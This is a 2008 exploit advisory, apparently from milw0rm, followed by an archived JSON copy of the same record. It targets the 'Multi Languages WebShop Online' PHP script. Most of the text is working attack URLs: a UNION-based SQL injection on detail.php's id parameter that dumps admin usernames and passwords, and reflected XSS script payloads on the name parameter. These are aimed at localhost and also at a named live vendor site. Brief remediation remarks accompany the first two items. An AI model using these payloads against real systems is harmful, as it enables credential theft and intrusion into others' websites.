-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
IN THE NAME OF ALLAH
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Multi Languages WebShop Online (name:XSS|id:SQLi) Multiple Remote Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[~] Script: Multi Languages WebShop Online
[~] Language : PHP
[~] Website[0]: http://webbdomain.com/php/webshopir/
[~] Website[1]: http://www.hotscripts.com/Detailed/84437.html
[~] Type : Commercial
[~] Report-Date : 04/11/2008 (DD/MM/YYYY, i.e. 4 November 2008)
--[ Founder ]--
G4N0K <mail.ganok[at]gmail.com>
--[ Exploit ]--
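SQL injection => id parameter of detail.php
(the single quote after -13 in the PoC indicates the value lands inside a quoted SQL string without escaping; remediation: bind id as a query parameter, or cast it to an integer before it reaches the query)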
[+] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11--
http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK
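XSS => name parameter of detail.php
(the "> prefix in the PoC indicates the value is written into an HTML attribute without output encoding; remediation: encode on output, e.g. htmlspecialchars() with ENT_QUOTES)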
[+][0] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]&price=20&id=13
[+][1] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]
--[ L!ve ]--
[SQL] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11--
http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK
[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E&price=20&id=13
[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E
--[ Greetz ]--
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>
//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH, forgimme...
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# milw0rm.com [2008-11-04]
{"lastseen": "2020-04-01T19:04:54", "references": [], "description": "\nWEBBDOMAIN WebShop 1.02 - SQL Injection Cross-Site Scripting", "edition": 1, "reporter": "G4N0K", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2008-11-04T00:00:00", "title": "WEBBDOMAIN WebShop 1.02 - SQL Injection Cross-Site Scripting", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:54", "rev": 2}, "score": {"value": 0.0, "vector": "NONE", "modified": "2020-04-01T19:04:54", "rev": 2}, "vulnersScore": 0.0}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2008-11-04T00:00:00", "id": "EXPLOITPACK:6413D09A0F04B73E744EAC9150ED04A7", "href": "", "viewCount": 1, "sourceData": "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n \t\t\tIN THE NAME OF ALLAH\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\nMulti Languages WebShop Online (name:XSS|id:SQLi) Multiple Remote Vulnerabilities\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n[~] Script: \tMulti Languages WebShop Online\n[~] Language : \tPHP\n[~] Website[0]: \thttp://webbdomain.com/php/webshopir/\n[~] Website[1]: \thttp://www.hotscripts.com/Detailed/84437.html\n[~] Type : \tCommercial\n[~] Report-Date : \t04/11/2008\n\n\n--[ Founder ]--\nG4N0K <mail.ganok[at]gmail.com>\n\n\n--[ Exploit ]--\nSQL => id\n[+] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11--\n http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK\n\nXSS => name\n[+][0] http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]&price=20&id=13\n[+][1] 
http://localhost/[path]/detail.php?image=u0646ur0xm.gif&name=[XSS]\n\n\n\n--[ L!ve ]--\n[SQL] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13'+UNION+ALL+SELECT+1,2,3,4,5,6,user(),8,9,10,11--\n http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k&price=20&id=-13' UNION ALL SELECT 1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11+FROM+admin--+AND+'GNK'='GNK\n[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E&price=20&id=13\n[XSS] http://webbdomain.com/php/webshopir/detail.php?image=u0646ur0xm.gif&name=g4n0k%22%3E%3Cscript%3Ealert(%27G4N0K%27)%3C/script%3E\n\n\n--[ Greetz ]--\n[~] ALLAH\n[~] Tornado2800 <Tornado2800[at]gmail.com>\n[~] Hussain-X <darkangel_g85[at]yahoo.com>\n\n//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)\n//ALLAH, forgimme...\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\nexit(); //EoX\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n# milw0rm.com [2008-11-04]", "cvss": {"score": 0.0, "vector": "NONE"}}